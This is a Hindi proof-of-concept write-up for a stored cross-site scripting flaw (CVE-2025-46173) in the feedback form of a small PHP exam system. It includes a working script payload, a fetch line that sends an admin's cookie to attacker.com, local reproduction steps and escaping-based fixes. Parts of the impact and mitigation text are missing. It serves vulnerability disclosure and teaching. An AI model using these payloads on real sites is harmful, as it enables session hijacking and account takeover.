
CVE-2025-46173 के लिए PoC
CVE-2025-46173 code-projects द्वारा ऑनलाइन परीक्षा मास्टरिंग सिस्टम 1.0 में पाया गया एक स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी है। यह कमजोरी feedback.php घटक में मौजूद है जहाँ उपयोगकर्ता का इनपुट नाम फ़ील्ड में ठीक से स्वच्छ नहीं किया जाता है, जिससे एक दुर्भावनापूर्ण अभिनेता मनमाना जावास्क्रिप्ट इंजेक्ट कर सकता है। जब कोई व्यवस्थापक एडमिन डैशबोर्ड (dash.php) में इस फीडबैक को देखता है, तो पेलोड व्यवस्थापक के ब्राउज़र में निष्पादित हो जाता है, जिससे सत्र अपहरण और संभावित विशेषाधिकार वृद्धि होती है।
feedback.php, dash.phpएक उपयोगकर्ता फीडबैक फॉर्म में नाम फ़ील्ड में निम्नलिखित पेलोड सबमिट करता है:
<script>alert(document.cookie)</script>

जब व्यवस्थापक बाद में dash.php में सबमिट किए गए फीडबैक को देखता है, तो पेलोड निष्पादित होता है:

व्यवस्थापक का सत्र कुकी document.cookie के माध्यम से उजागर होता है, जिसे बाहर निकाला जा सकता है:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
code-projects से कमजोर संस्करण को क्लोन या सेट करें।
localhost/exam/feedback.php पर जाएं।
"Name" फ़ील्ड में भरें:
<script>alert(document.cookie)</script>
फॉर्म सबमिट करें।
व्यवस्थापक के रूप में लॉगिन करें और फीडबैक देखने के लिए dash.php?q=3 पर जाएं।
स्क्रिप्ट व्यवस्थापक के संदर्भ में निष्पादित होगी।
सफल शोषण से एक दूरस्थ हमलावर निम्नलिखित कर सकता है:
&, <, >, ") को एस्केप करके।htmlspecialchars() या फ्रंटएंड सत्यापन + बैकएंड स्वच्छता संयोजन जैसी मजबूत स्वच्छता लाइब्रेरी का उपयोग करें।प्रुथु राउत LinkedIn | TryHackMe शीर्ष 2% | GitHub
स्क्रीनशॉट केवल शैक्षिक उद्देश्यों के लिए हैं। सभी परीक्षण स्थानीय वातावरण में किए गए थे।
डेमो वीडियो देखने के लिए यहाँ क्लिक करें
यह जानकारी केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है। इसका उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।